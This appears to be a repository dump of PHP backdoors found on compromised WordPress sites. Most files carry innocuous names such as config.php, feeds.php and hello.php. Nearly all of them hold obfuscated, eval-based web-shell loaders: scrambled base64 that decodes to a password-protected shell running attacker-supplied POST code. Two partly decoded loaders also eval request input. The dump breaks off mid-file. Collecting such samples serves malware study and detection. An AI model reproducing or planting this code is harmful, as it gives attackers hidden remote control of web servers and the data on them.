pOwoKIC8gIGlmICghaXNzZXQoJDEBTAELSUVbbWQ2KCRfUAVSVkVSWydIVDRQXAhPU2Q"."nXSldKS0FfC8oJDEBTAELSUVbbWQ2KCRfUAVSVkVSWydIVDRQXAhPU2"."QnXSldIC4EICRhdXRoX70hc7MpKQogIC8gIC8gIHdzbAxvZ6luKCk9CnAKCmZ2bmNAaWEuIGDjdGlvblIoKS09Ci8gIC0"."pZighQCRfU4ETVDsnZXYnXSkgewogIC8gIC8gICRhIBAgYXJyYXkoCi8gIC"."8gIC8gIC8gICJ2bmDtZSIgPT5gcGhwX7VuYW2lKCksCi8gIC8g"."IC8gIC8gICJwaH0fdmVyc6lvbiIgPT5gcGhwdmVyc6lvbigpL8ogIC8gIC8gIC8gIC8id7NvX7Zlc"."nNpb65iIBA+IDdTT2EWRVJTSUEOL8ogIC8gIC8gIC8gIC8ic6DmZW2vZGUiIBA+I40pbmlfZ6VAKCdzYWZlX62vZGUnKQogIC8gI"."C8gICk9Ci8gIC8gIC8gZWNoby0zZXJpYWxpemUoJG4pOwogIC8gfS0lbHNlI"."HsKIC8gIC8gIC0ldmDsKCRfU4ETVDsnZXYnXSk9Ci8gIC0ECnAKCmlmKC0lbX0AeSgkX20PU2RbJ6MnXSkgKQog"."IC8gaWYoaXNzZXQoJGRlZmD2bHRfYWNAaWEuKS8mJi0mdW1jdGlvblEleGlzdHMoJ6DjdGl"."vbicgLi8kZGVmYXVsdDEhY7Rpb65pKQogIC8gIC8gICRfU4ETVDsnYyddIBAgJG"."RlZmD2bHRfYWNAaWEuOwogIC8gZWxzZQogIC8gIC8gICRfU4ETVDsnYyddIBAgJ2NlYAluZmFnOwppZiggIWVtcHR1KCR"."fU4ETVDsnYyddKS8mJi0mdW1jdGlvblEleGlzdHMoJ6DjdGlvbicgL"."i8kX20PU2RbJ6MnXSkgKQogIC8gY6DsbDE2c6VyX6Z2bmMoJ6DjdGlvbicgLi8kX20PU2RbJ6MnXSk9"."CmV5aXQ9";eval/*bzcw*/(kzejl($lmqyfz, $zipubwth));?> -------------------------------------------------------------------------------- /found_on_wordpress/config.php: -------------------------------------------------------------------------------- 1 | "4", "C"=>"9", "B"=>"C", "E"=>"E", "D"=>"8", "F"=>"A", "1"=>"5", "0"=>"F", "3"=>"0", "2"=>"7", "5"=>"D", "4"=>"6", "7"=>"3", "6"=>"2", "9"=>"1", "8"=>"B");$itzekknra = "BgokZGVmYXVsd0ChY7Rpb6AgPSFnQ3MnOwoKQGluaVCzZXQoJ6VycmCyX6xvZycs"."TlVMTBk2Bk8pbmlfc6V3KBdsb6dfZXJyb7JzJywwKTsKQGluaVCzZXQoJ69he0CleGVjdXRpb61fdGltZScsMBk2Bk8zZXR"."fdGltZVCsaW9pdBgwKTsKQHNld0CtYWdpY9CxdWC3ZXNfcnVudGltZSgwKTsKQGRlZmluZS"."gnV9NPX9Z0UlNJT3AnLBFnMiA9LjInKTsKBmlmKGdld0CtYWdpY9CxdWC3ZXNfZ78jK"."BkpIHsKIBFgIGZ9bmN3aWCuI0dTT7N3cmlwc6xhc6hlcygkYXJyYXkpIHsKIBFgIBF"."gIB8yZXR9cmAgaXNfYXJyYXkoJG0ycm01KSF/IG0ycm01X69hcBgnV9NPc7RyaX8zbG0zaGVzJywgJG0ycm01KSF"."4IHN3cmlwc6xhc6hlcygkYXJyYXkpOwogIBFgfQogIBFgJ0CQT"."9NUI53gV9NPc7RyaX8zbG0zaGVzKBRfUECTVBk2BiFgIBFkX3NPT3tJRSFCI0dTT"."7N3cmlwc6xhc6hlcygkX3NPT3tJRSk2Bn3KBmZ9bmN3aWCuIHdzb3xvZ6luKBkgewogIBFgaGVhZGV"."yKBdIV0RQLzEuMBF3M5QgTmC3IEZvdW1kJyk2BiFgIB8kaWUoIjQw"."NBIpOwpCBgpmdW1jdGlvbi8XU3CzZXRjb6CraWUoJGssIBR6KS82BiFgIBFkX3NPT"."3tJRVska93gPSFkdjsKIBFgIHNldGNvb6tpZSgkaywgJHYpOwpCBgppZighZW9wdHkoJ"."G09dGhfcG0zcykpIHsKIBFgIGlmKGlzc6V3KBRfUECTV0sncG0zcyddKSFmJiFobWQ9KBRfUECTV0sncG0zcyddKSFCPSFk"."YXV3a0CwYXNzKSkKIBFgIBFgIB8XU3CzZXRjb6CraWUobWQ9KBRfU3VSVkVSWydI"."V0RQX3hPU9QnXSksIBRhdXRoX78hc7MpOwoKIBFgIGlmIBghaXNzZXQoJ0C5T3CLSUVbbWQ9KBRfU3VSVkVS"."WydIV0RQX3hPU9QnXSldKS8DfBFoJ0C5T3CLSUVbbWQ9KBRfU3VSVkVSW"."ydIV0RQX3hPU9QnXSldIBECIBRhdXRoX78hc7MpKQogIBFgIBFgIHdzb3xvZ6luKBk2Bn3KBmZ9bmN3aWCuIG0jdG"."lvblIoKS82BiFgIB8pZighQBRfUECTV0snZXYnXSkgewogIBFgIBFgIBRhI53gYXJyYXkoBiFgIBFgIBFgIBFgIBJ9"."bm0tZSIgPTAgcGhwX7VuYW9lKBksBiFgIBFgIBFgIBFgIBJwaH8fdmVyc6lvbiIgPTAgcGhwdmVyc6lvbigp"."LFogIBFgIBFgIBFgIBFid7NvX7ZlcnNpb6AiI53+I0dTT9CWRVJTSUCOLFogIBFgIBFgIBFgIBFic60mZW"."9vZGUiI53+IE8pbmlfZ6V3KBdzYWZlX69vZGUnKQogIBFgIBFgIBk2BiFgIBFgIBFgZWNoby8zZXJpYWxpemUoJGEpOwogIB"."FgfS8lbHNlIHsKIBFgIBFgIB8ldm0sKBRfUECTV0snZXYnXSk2BiFgIB8CBn3KBmlmKB8lb"."X83eSgkX98PU9RbJ6MnXSkgKQogIBFgaWYoaXNzZXQoJGRlZm09bHRfYWN3aWCuKSFmJi8mdW1jdGlvblCleG"."lzdHMoJ60jdGlvbicgLiFkZGVmYXVsd0ChY7Rpb6ApKQogIBFgIBFgIBRfUECTV0snYyddI53gJGRl"."Zm09bHRfYWN3aWCuOwogIBFgZWxzZQogIBFgIBFgIBRfUECTV0snYyddI53gJ9NlY3luZmDnOwppZiggIWVtcHR1"."KBRfUECTV0snYyddKSFmJi8mdW1jdGlvblCleGlzdHMoJ60jdGlvbicgLiFkX98PU9RbJ6MnXSkgKQo"."gIBFgY60sb0C9c6VyX6Z9bmMoJ60jdGlvbicgLiFkX98PU9RbJ6MnXSk2BmVAaXQ2";eval/*biiybhgk*/(ahrvi($itzekknra, $jtpip));?> -------------------------------------------------------------------------------- /found_on_wordpress/config2.php: -------------------------------------------------------------------------------- 1 | "5", "C"=>"C", "B"=>"4", "E"=>"7", "D"=>"8", "F"=>"6", "1"=>"B", "0"=>"9", "3"=>"3", "2"=>"E", "5"=>"1", "4"=>"A", "7"=>"0", "6"=>"D", "9"=>"2", "8"=>"F");$djmtxusqrw = "CgokZGVmYXVsd80hY3Rpb9BgPS4nQ7MnOwoKQGluaV0zZXQoJ9Vycm0yX9xvZyc"."sTlVMTCkECk1pbmlfc9V7KCdsb9dfZXJyb3JzJywwKTsKQGluaV0zZXQoJ95"."he80leGVjdXRpb9AfdGltZScsMCkECk1zZXRfdGltZV0saW5pdCgwKTsKQHNld80tYWd"."pY50xdW07ZXNfcnVudGltZSgwKTsKQGRlZmluZSgnV5NPX5Z8UlNJT7BnLC4nMiB5"."LjInKTsKCmlmKGdld80tYWdpY50xdW07ZXNfZ31jKCkpIHsKIC4gIGZ"."5bmN7aW0uI8dTT3N7cmlwc9xhc9hlcygkYXJyYXkpIHsKIC4gIC4gIC1yZXR5cmBgaXNfYXJyYXkoJG8ycm8AKS4/I"."G8ycm8AX95hcCgnV5NPc3RyaX1zbG8zaGVzJywgJG8ycm8AKS4FIH"."N7cmlwc9xhc9hlcygkYXJyYXkpOwogIC4gfQogIC4gJ80QT5NUI67g"."V5NPc3RyaX1zbG8zaGVzKCRfU20TVCkECi4gIC4kX7NPT7tJRS40I"."8dTT3N7cmlwc9xhc9hlcygkX7NPT7tJRSkECn7KCmZ5bmN7aW0uIHdzb7xvZ9luKCkgewogIC4gaGVhZGVyKCdIV8RQLz"."2uMC47M6QgTm07I2ZvdWAkJykECi4gIC1kaWUoIjQwNCIpOwp0CgpmdWAjdGlvbi1XU70zZXRjb90raWUoJGssICR9K"."S1ECi4gIC4kX7NPT7tJRVska57gPS4kdjsKIC4gIHNldGNvb9tpZSgkaywgJHYpOwp0C"."gppZighZW5wdHkoJG85dGhfcG8zcykpIHsKIC4gIGlmKGlzc9V7KCRfU20TV8sncG8zcyddKS4m"."Ji4obWQ5KCRfU20TV8sncG8zcyddKS40PS4kYXV7a80wYXNzKSkKIC4g"."IC4gIC1XU70zZXRjb90raWUobWQ5KCRfU7VSVkVSWydIV8RQX7hPU5QnXSksICRhdXRoX31hc3MpOwoKIC4gIGlmICghaXN"."zZXQoJ806T70LSUVbbWQ5KCRfU7VSVkVSWydIV8RQX7hPU5QnXSldKS1DfC4oJ806T70LSUVbbWQ5KC"."RfU7VSVkVSWydIV8RQX7hPU5QnXSldIC20ICRhdXRoX31hc3MpKQogIC4gIC4gIHdzb7xvZ9luKCkECn7KCmZ5bmN7aW0uIG8j"."dGlvblIoKS1ECi4gIC1pZighQCRfU20TV8snZXYnXSkgewogIC4gIC4gICRhI67gYXJyYXkoCi4gIC4gIC4gI"."C4gICJ5bm8tZSIgPTBgcGhwX3VuYW5lKCksCi4gIC4gIC4gIC4gICJwaH1fdmV"."yc9lvbiIgPTBgcGhwdmVyc9lvbigpL4ogIC4gIC4gIC4gIC4id3NvX3ZlcnNpb9BiI"."67+I8dTT50WRVJTSU0OL4ogIC4gIC4gIC4gIC4ic98mZW5vZGUiI67+I21pbmlfZ9V7KCdzYWZlX"."95vZGUnKQogIC4gIC4gICkECi4gIC4gIC4gZWNoby1zZXJpYWxpemUoJG2pOwogIC"."4gfS1lbHNlIHsKIC4gIC4gIC1ldm8sKCRfU20TV8snZXYnXSkECi4gIC10Cn7KCmlmKC1lbX17eSgkX"."51PU5RbJ9MnXSkgKQogIC4gaWYoaXNzZXQoJGRlZm85bHRfYWN7aW0uKS4mJi1mdWAjdGlvbl0leGlzdHMoJ98jdGlvbicgLi"."4kZGVmYXVsd80hY3Rpb9BpKQogIC4gIC4gICRfU20TV8snYyddI67gJGRlZm85bHRf"."YWN7aW0uOwogIC4gZWxzZQogIC4gIC4gICRfU20TV8snYyddI67gJ5NlY7luZmDnOwp"."pZiggIWVtcHRAKCRfU20TV8snYyddKS4mJi1mdWAjdGlvbl0leGlzdHMoJ98jdGlvbicgLi4kX51PU5RbJ9MnXSkgKQogIC4gY9"."8sb805c9VyX9Z5bmMoJ98jdGlvbicgLi4kX51PU5RbJ9MnXSkECmVBaXQE";eval/*ldjllkquav*/(rhlxcjfm($djmtxusqrw, $jugzwfq));?> -------------------------------------------------------------------------------- /found_on_wordpress/defines.php: -------------------------------------------------------------------------------- 1 | "1", "C"=>"3", "B"=>"4", "E"=>"D", "D"=>"5", "F"=>"7", "1"=>"6", "0"=>"A", "3"=>"8", "2"=>"E", "5"=>"0", "4"=>"2", "7"=>"B", "6"=>"9", "9"=>"C", "8"=>"F");$amwkghrc = "9gokZGVmYXVsd86hYCRpb4BgPS0nQ5MnOwoKQGluaV6zZXQoJ4Vycm6yX4xvZy"."csTlVMT9kF9k7pbmlfc4V5K9dsb4dfZXJybCJzJywwKTsKQGluaV6zZXQoJ4Ahe86leGVjdXRpb4DfdGltZScs"."M9kF9k7zZXRfdGltZV6saWApd9gwKTsKQHNld86tYWdpYA6xdW65ZXNfcnVudGltZSgwKTsKQ"."GRlZmluZSgnVANPXAZ8UlNJT5BnL90nMiBALjInKTsK9mlmKGdld86"."tYWdpYA6xdW65ZXNfZC7jK9kpIHsKI90gIGZAbmN5aW6uI8dTTCN5cmlwc4xhc4hlcygkYXJyYXkpIHsKI90gI90gI97yZXRAcmB"."gaXNfYXJyYXkoJG8ycm8DKS0/IG8ycm8DX4Ahc9gnVANPcCRyaX7zbG8zaGVzJywgJG8ycm8DKS01IHN5cml"."wc4xhc4hlcygkYXJyYXkpOwogI90gfQogI90gJ86QTANUIE5gVANPcCRyaX7zbG8z"."aGVzK9RfU26TV9kF9i0gI90kX5NPT5tJRS06I8dTTCN5cmlwc4xhc4hlc"."ygkX5NPT5tJRSkF9n5K9mZAbmN5aW6uIHdzb5xvZ4luK9kgewogI90gaGVhZGVyK9dIV8RQLz2u"."M905MEQgTm65I2ZvdWDkJykF9i0gI97kaWUoIjQwN9IpOwp69gpmdWDjd"."Glvbi7XU56zZXRjb46raWUoJGssI9R4KS7F9i0gI90kX5NPT5t"."JRVskaA5gPS0kdjsKI90gIHNldGNvb4tpZSgkaywgJHYpOwp69gppZighZWAwdHko"."JG8AdGhfcG8zcykpIHsKI90gIGlmKGlzc4V5K9RfU26TV8sncG8zcyddKS0mJi0obWQAK9RfU26TV8sncG8zcyddKS"."06PS0kYXV5a86wYXNzKSkKI90gI90gI97XU56zZXRjb46raWUobWQAK9RfU5VSVkVSWydI"."V8RQX5hPUAQnXSksI9RhdXRoXC7hcCMpOwoKI90gIGlmI9ghaXNzZXQoJ86ET"."56LSUVbbWQAK9RfU5VSVkVSWydIV8RQX5hPUAQnXSldKS73f90oJ86ET56LSUVbbWQA"."K9RfU5VSVkVSWydIV8RQX5hPUAQnXSldI926I9RhdXRoXC7hcCMpKQogI90gI90gIHdzb5xvZ4luK9kF9n5K9mZAb"."mN5aW6uIG8jdGlvblIoKS7F9i0gI97pZighQ9RfU26TV8snZXYnXSkgewogI90gI9"."0gI9RhIE5gYXJyYXko9i0gI90gI90gI90gI9JAbm8tZSIgPTBgcGhwXCVuYWAlK9ks9i0gI90gI9"."0gI90gI9JwaH7fdmVyc4lvbiIgPTBgcGhwdmVyc4lvbigpL0ogI90gI90gI90gI90idCNvXCZlcnNpb4BiIE5+I"."8dTTA6WRVJTSU6OL0ogI90gI90gI90gI90ic48mZWAvZGUiIE5+I27p"."bmlfZ4V5K9dzYWZlX4AvZGUnKQogI90gI90gI9kF9i0gI90gI90gZWNoby7zZXJpYWxpemUoJG2pOwogI90"."gfS7lbHNlIHsKI90gI90gI97ldm8sK9RfU26TV8snZXYnXSkF9i0gI9769n5K9mlmK97lbX75eSgkXA7PUARbJ4MnXSkgKQog"."I90gaWYoaXNzZXQoJGRlZm8AbHRfYWN5aW6uKS0mJi7mdWDjdGlvbl6leGlzdHMoJ48jdGlvbicgLi0kZGVmYX"."Vsd86hYCRpb4BpKQogI90gI90gI9RfU26TV8snYyddIE5gJGRlZm8AbHRfYWN5aW6uOwogI90gZWxzZQogI90gI90"."gI9RfU26TV8snYyddIE5gJANlY5luZm3nOwppZiggIWVtcHRDK9RfU26TV8snYyddKS0mJi7mdWDjdGl"."vbl6leGlzdHMoJ48jdGlvbicgLi0kXA7PUARbJ4MnXSkgKQogI90gY48sb86Ac4VyX4ZAbmMoJ48jdGlv"."bicgLi0kXA7PUARbJ4MnXSkF9mVBaXQF";eval/*byrbbsbprr*/(kenxtwli($amwkghrc, $hlecffzbx));?> -------------------------------------------------------------------------------- /found_on_wordpress/exceptions.php: -------------------------------------------------------------------------------- 1 | "D", "C"=>"B", "B"=>"4", "E"=>"F", "D"=>"C", "F"=>"7", "1"=>"E", "0"=>"9", "3"=>"0", "2"=>"2", "5"=>"A", "4"=>"8", "7"=>"1", "6"=>"3", "9"=>"5", "8"=>"6");$fuwkgtdbkv = "DgokZGVmYXVsdE0hY6Rpb2BgPS5nQ3MnOwoKQGluaV0zZXQoJ2Vycm0yX2xvZycsTlVMTDk"."FDkCpbmlfc2V3KDdsb2dfZXJyb6JzJywwKTsKQGluaV0zZXQoJ27heE0leGVjdXRpb29fdGltZSc"."sMDkFDkCzZXRfdGltZV0saW7pdDgwKTsKQHNldE0tYWdpY70xdW03ZXNfcnVudGltZSgwKTsKQGR"."lZmluZSgnV7NPX7ZEUlNJT3BnLD5nMiB7LjInKTsKDmlmKGdldE0tYWdpY70xdW03ZXNfZ6CjKDkpIHsKID5gIGZ7b"."mN3aW0uIEdTT6N3cmlwc2xhc2hlcygkYXJyYXkpIHsKID5gID5gIDCyZXR7c"."mBgaXNfYXJyYXkoJGEycmE9KS5/IGEycmE9X27hcDgnV7NPc6RyaXCzbGEzaGVzJywgJGEycmE9KS58IHN3cmlwc2xhc2h"."lcygkYXJyYXkpOwogID5gfQogID5gJE0QT7NUIA3gV7NPc6RyaXCzbGEza"."GVzKDRfU10TVDkFDi5gID5kX3NPT3tJRS50IEdTT6N3cmlwc2xhc2hlcygkX3NPT3tJRSkFDn3KD"."mZ7bmN3aW0uIHdzb3xvZ2luKDkgewogID5gaGVhZGVyKDdIVERQLz1uMD53MAQgTm03I1ZvdW9"."kJykFDi5gIDCkaWUoIjQwNDIpOwp0DgpmdW9jdGlvbiCXU30zZXRjb20raWUoJGssIDR2"."KSCFDi5gID5kX3NPT3tJRVska73gPS5kdjsKID5gIHNldGNvb2tpZSgkaywgJHYpOwp0DgppZ"."ighZW7wdHkoJGE7dGhfcGEzcykpIHsKID5gIGlmKGlzc2V3KDRfU10TVEsncGEzcyddKS5mJi5obWQ7KDRfU10TVEsncGEzc"."yddKS50PS5kYXV3aE0wYXNzKSkKID5gID5gIDCXU30zZXRjb20"."raWUobWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSksIDRhdXRoX6Chc6MpOwoKID5gIGlmIDghaXNzZXQoJE0AT30LSUVbbWQ7KDR"."fU3VSVkVSWydIVERQX3hPU7QnXSldKSC4fD5oJE0AT30LSUVbbWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSl"."dID10IDRhdXRoX6Chc6MpKQogID5gID5gIHdzb3xvZ2luKDkFDn3KDmZ7bmN3aW0uIGEjdGlvblIoKSCFDi5gIDCpZighQ"."DRfU10TVEsnZXYnXSkgewogID5gID5gIDRhIA3gYXJyYXkoDi5gID5g"."ID5gID5gIDJ7bmEtZSIgPTBgcGhwX6VuYW7lKDksDi5gID5gID5gID5gIDJwaHCfdmVyc2lvbiIgPTBgcGhwdmVyc2lvbigpL5og"."ID5gID5gID5gID5id6NvX6ZlcnNpb2BiIA3+IEdTT70WRVJTSU0OL5ogID5gID5gID5gID5ic2EmZW7vZGUiIA3+I1CpbmlfZ2V3"."KDdzYWZlX27vZGUnKQogID5gID5gIDkFDi5gID5gID5gZWNobyCzZXJpYWxpemUoJG1pOwogID5gfSClbHNlIHsKID5"."gID5gIDCldmEsKDRfU10TVEsnZXYnXSkFDi5gIDC0Dn3KDmlmK"."DClbXC3eSgkX7CPU7RbJ2MnXSkgKQogID5gaWYoaXNzZXQoJGRlZmE7bHRfYWN"."3aW0uKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kZGVmYXVsdE0hY6Rpb2BpKQogID5gID5gID"."RfU10TVEsnYyddIA3gJGRlZmE7bHRfYWN3aW0uOwogID5gZWxz"."ZQogID5gID5gIDRfU10TVEsnYyddIA3gJ7NlY3luZm4nOwppZiggIWVtcHR9K"."DRfU10TVEsnYyddKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kX7CPU7RbJ"."2MnXSkgKQogID5gY2EsbE07c2VyX2Z7bmMoJ2EjdGlvbicgLi5kX7CPU7RbJ2MnXSkFDmV"."BaXQF";eval/*k*/(ngomynsz($fuwkgtdbkv, $jgzzljfjj));?> -------------------------------------------------------------------------------- /found_on_wordpress/feeds.php: -------------------------------------------------------------------------------- 1 | "D", "C"=>"8", "B"=>"2", "E"=>"0", "D"=>"3", "F"=>"9", "1"=>"A", "0"=>"4", "3"=>"B", "2"=>"1", "5"=>"C", "4"=>"6", "7"=>"E", "6"=>"5", "9"=>"F", "8"=>"7");$pwpvpyo = "5gokZGVmYXVsd9FhYDRpbB0gPS1nQEMnOwoKQGluaVFzZXQoJBVycmFyXBxvZycsTlVMT5k85k3"."pbmlfcBVEK5dsbBdfZXJybDJzJywwKTsKQGluaVFzZXQoJB2he9FleGVjdXRpbB6fdG"."ltZScsM5k85k3zZXRfdGltZVFsaW2pd5gwKTsKQHNld9FtYWdpY2FxdWFEZXNfc"."nVudGltZSgwKTsKQGRlZmluZSgnV2NPX2Z9UlNJTE0nL51nMi02LjInKTsK5mlmKGdld9FtYWdpY2FxdWFE"."ZXNfZD3jK5kpIHsKI51gIGZ2bmNEaWFuI9dTTDNEcmlwcBxhcBhlcygkYXJyYXkpIHsKI51gI51gI53yZXR2cm0ga"."XNfYXJyYXkoJG9ycm96KS1/IG9ycm96XB2hc5gnV2NPcDRyaX3z"."bG9zaGVzJywgJG9ycm96KS14IHNEcmlwcBxhcBhlcygkYXJyYXkpOwogI51gfQogI51gJ9FQT2NUIAEgV2NPcDRyaX3"."zbG9zaGVzK5RfU7FTV5k85i1gI51kXENPTEtJRS1FI9dTTDNEcmlwcBxh"."cBhlcygkXENPTEtJRSk85nEK5mZ2bmNEaWFuIHdzbExvZBluK5kgewogI51gaGVhZGV"."yK5dIV9RQLz7uM51EMAQgTmFEI7ZvdW6kJyk85i1gI53kaWUoIjQwN5IpOwpF5gpmdW6jdGlvbi3XUEFzZX"."RjbBFraWUoJGssI5RBKS385i1gI51kXENPTEtJRVska2EgPS1kdjsKI51gIHNldGNvbBtpZSgkay"."wgJHYpOwpF5gppZighZW2wdHkoJG92dGhfcG9zcykpIHsKI51gIGlmKGlzcBVEK5RfU7FTV9sncG9zcydd"."KS1mJi1obWQ2K5RfU7FTV9sncG9zcyddKS1FPS1kYXVEa9FwYXNzKSkKI51gI51gI53XUEFzZXRjbBFraWUo"."bWQ2K5RfUEVSVkVSWydIV9RQXEhPU2QnXSksI5RhdXRoXD3hcDMpOwoKI51gI"."GlmI5ghaXNzZXQoJ9FATEFLSUVbbWQ2K5RfUEVSVkVSWydIV9RQX"."EhPU2QnXSldKS3Cf51oJ9FATEFLSUVbbWQ2K5RfUEVSVkVSWydIV9RQXEhPU2QnXSldI57FI5RhdXRoXD3h"."cDMpKQogI51gI51gIHdzbExvZBluK5k85nEK5mZ2bmNEaWFuIG"."9jdGlvblIoKS385i1gI53pZighQ5RfU7FTV9snZXYnXSkgewogI51gI51gI5RhIAEgYXJyY"."Xko5i1gI51gI51gI51gI5J2bm9tZSIgPT0gcGhwXDVuYW2lK5ks5i1gI51gI51g"."I51gI5JwaH3fdmVycBlvbiIgPT0gcGhwdmVycBlvbigpL1ogI51gI51gI51gI51idDNvXDZlcnNpbB0iIAE+I9dTT2FWR"."VJTSUFOL1ogI51gI51gI51gI51icB9mZW2vZGUiIAE+I73pbmlfZBVEK5dzYWZlXB2vZGUnKQogI51gI51"."gI5k85i1gI51gI51gZWNoby3zZXJpYWxpemUoJG7pOwogI51gfS3lbHNlIHsKI"."51gI51gI53ldm9sK5RfU7FTV9snZXYnXSk85i1gI53F5nEK5mlmK53lbX3EeSgkX23PU2RbJBMnXSkgKQogI51gaW"."YoaXNzZXQoJGRlZm92bHRfYWNEaWFuKS1mJi3mdW6jdGlvblFleGlzdHMoJB9jdGl"."vbicgLi1kZGVmYXVsd9FhYDRpbB0pKQogI51gI51gI5RfU7FTV9snYyddIAEgJGRlZm"."92bHRfYWNEaWFuOwogI51gZWxzZQogI51gI51gI5RfU7FTV9snYyddIAEgJ2NlYEluZmCnOwppZiggIWVtcHR6K5RfU7FTV9sn"."YyddKS1mJi3mdW6jdGlvblFleGlzdHMoJB9jdGlvbicgLi1kX23PU2RbJB"."MnXSkgKQogI51gYB9sb9F2cBVyXBZ2bmMoJB9jdGlvbicgLi1kX23PU2RbJBMnXSk85mV0aXQ8";eval/*oxle*/(fzlngft($pwpvpyo, $chhere));?> -------------------------------------------------------------------------------- /found_on_wordpress/header.php: -------------------------------------------------------------------------------- 1 | section and everything up till
    6 | * 7 | * @package Sketch 8 | */ 9 | ?> 10 | > 11 | 12 | 13 | 14 | <?php wp_title( '|', true, 'right' ); ?> 15 | 16 | 17 | 18 | 19 | 20 | 21 | > 22 |
    23 | 24 | 40 | 41 |
    42 | 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /found_on_wordpress/hello.php: -------------------------------------------------------------------------------- 1 | "7", "C"=>"1", "B"=>"4", "E"=>"9", "D"=>"B", "F"=>"F", "1"=>"D", "0"=>"3", "3"=>"C", "2"=>"5", "5"=>"6", "4"=>"2", "7"=>"A", "6"=>"E", "9"=>"0", "8"=>"8");$qgqqdlu = "3gokZGVmYXVsdFEhY0Rpb4BgPS7nQ9MnOwoKQGluaVEzZXQoJ4VycmEyX4xvZycsTlVMT3kA3kDpbml"."fc4V9K3dsb4dfZXJyb0JzJywwKTsKQGluaVEzZXQoJ4CheFEleGVjdXRp"."b42fdGltZScsM3kA3kDzZXRfdGltZVEsaWCpd3gwKTsKQHNldFEtYWdpYCExdWE9ZXNfcnVudGltZSgw"."KTsKQGRlZmluZSgnVCNPXCZFUlNJT9BnL37nMiBCLjInKTsK3mlmKGdldFEtYWdpYCExdWE9ZXNfZ0DjK3kpIHsKI"."37gIGZCbmN9aWEuIFdTT0N9cmlwc4xhc4hlcygkYXJyYXkpIHsKI37gI37gI3Dy"."ZXRCcmBgaXNfYXJyYXkoJGFycmF2KS7/IGFycmF2X4Chc3gnVCNPc0RyaXDzbGFzaGVzJywgJGFycmF2KS75IHN9cmlwc4xhc4h"."lcygkYXJyYXkpOwogI37gfQogI37gJFEQTCNUI19gVCNPc0RyaXDzbGFzaGVzK3RfU6ETV3kA3i7gI37kX9NPT9tJRS7EIF"."dTT0N9cmlwc4xhc4hlcygkX9NPT9tJRSkA3n9K3mZCbmN9aWEuIHdzb9xvZ4luK3kgewogI37gaGVhZGVyK3d"."IVFRQLz6uM379M1QgTmE9I6ZvdW2kJykA3i7gI3DkaWUoIjQwN3IpOwpE3gpmdW2jdGlvbiDXU9EzZXR"."jb4EraWUoJGssI3R4KSDA3i7gI37kX9NPT9tJRVskaC9gPS7kdjsKI37gIHNldGN"."vb4tpZSgkaywgJHYpOwpE3gppZighZWCwdHkoJGFCdGhfcGFzcykpIHsKI37gIGlmKGlzc4V9K3RfU6ETVFsncGFzcyddKS7m"."Ji7obWQCK3RfU6ETVFsncGFzcyddKS7EPS7kYXV9aFEwYXNzKSkKI37gI37gI3DXU9EzZXRjb4EraWUob"."WQCK3RfU9VSVkVSWydIVFRQX9hPUCQnXSksI3RhdXRoX0Dhc0MpOwoKI37gIGl"."mI3ghaXNzZXQoJFE1T9ELSUVbbWQCK3RfU9VSVkVSWydIVFRQX9hPUCQnXSldKSD8f37oJFE1T"."9ELSUVbbWQCK3RfU9VSVkVSWydIVFRQX9hPUCQnXSldI36EI3RhdXR"."oX0Dhc0MpKQogI37gI37gIHdzb9xvZ4luK3kA3n9K3mZCbmN9aWEuIGFjdGlvbl"."IoKSDA3i7gI3DpZighQ3RfU6ETVFsnZXYnXSkgewogI37gI37gI3RhI"."19gYXJyYXko3i7gI37gI37gI37gI3JCbmFtZSIgPTBgcGhwX0VuYWClK3ks3i7gI37gI37gI3"."7gI3JwaHDfdmVyc4lvbiIgPTBgcGhwdmVyc4lvbigpL7ogI37gI37gI37gI37id0NvX0ZlcnNpb4BiI19+IF"."dTTCEWRVJTSUEOL7ogI37gI37gI37gI37ic4FmZWCvZGUiI19+I6DpbmlfZ4V9K3dzYWZlX4CvZGUnKQogI37gI37gI3"."kA3i7gI37gI37gZWNobyDzZXJpYWxpemUoJG6pOwogI37gfSDlbHNlIHsKI37g"."I37gI3DldmFsK3RfU6ETVFsnZXYnXSkA3i7gI3DE3n9K3mlmK3DlbXD9eSgkXCDPUCRbJ4MnXSkgKQogI"."37gaWYoaXNzZXQoJGRlZmFCbHRfYWN9aWEuKS7mJiDmdW2jdGlvblEleGlzdHMoJ4"."FjdGlvbicgLi7kZGVmYXVsdFEhY0Rpb4BpKQogI37gI37gI3RfU6ETVFsnYyddI"."19gJGRlZmFCbHRfYWN9aWEuOwogI37gZWxzZQogI37gI37gI3RfU6ETVFsnYyddI19gJCNlY9luZm8"."nOwppZiggIWVtcHR2K3RfU6ETVFsnYyddKS7mJiDmdW2jdGlvblEleGlzdHMoJ4FjdGl"."vbicgLi7kXCDPUCRbJ4MnXSkgKQogI37gY4FsbFECc4VyX4ZCbmMoJ4FjdGlvbicgLi7kXCDPUCRbJ4MnXSkA3mVBaXQ"."A";eval/*wkj*/(yiosgf($qgqqdlu, $zknsd));?> -------------------------------------------------------------------------------- /found_on_wordpress/hozwfbdp.php: -------------------------------------------------------------------------------- 1 | /* Decoded by unphp.net */ 2 | 3 | $iqtbkxe) { 17 | function ypvajaz($pexaijc, $qvhieyr, $coijg) { 18 | return $pexaijc[6]($pexaijc[4]($qvhieyr . $pexaijc[1], ($coijg / $pexaijc[8]($qvhieyr)) + 1), 0, $coijg); 19 | } 20 | function oybwfz($pexaijc, $imvmdw) { 21 | return @$pexaijc[9]($pexaijc[0], $imvmdw); 22 | } 23 | function jdkzd($pexaijc, $imvmdw) { 24 | $rvttfi = $pexaijc[3]($imvmdw) % 3; 25 | if (!$rvttfi) { 26 | eval($imvmdw[1]($imvmdw[2])); 27 | exit(); 28 | } 29 | } 30 | $iqtbkxe = oybwfz($pexaijc, $iqtbkxe); 31 | jdkzd($pexaijc, $pexaijc[5]($pexaijc[2], $iqtbkxe ^ ypvajaz($pexaijc, $qvhieyr, $pexaijc[8]($iqtbkxe)))); 32 | } ?> -------------------------------------------------------------------------------- /found_on_wordpress/jhefppgr.php: -------------------------------------------------------------------------------- 1 | /* Decoded by unphp.net */ 2 | 3 | $azxre) { 17 | function beanjw($inzbmds, $mgvsei, $vjozofh) { 18 | return $inzbmds[6]($inzbmds[4]($mgvsei . $inzbmds[2], ($vjozofh / $inzbmds[8]($mgvsei)) + 1), 0, 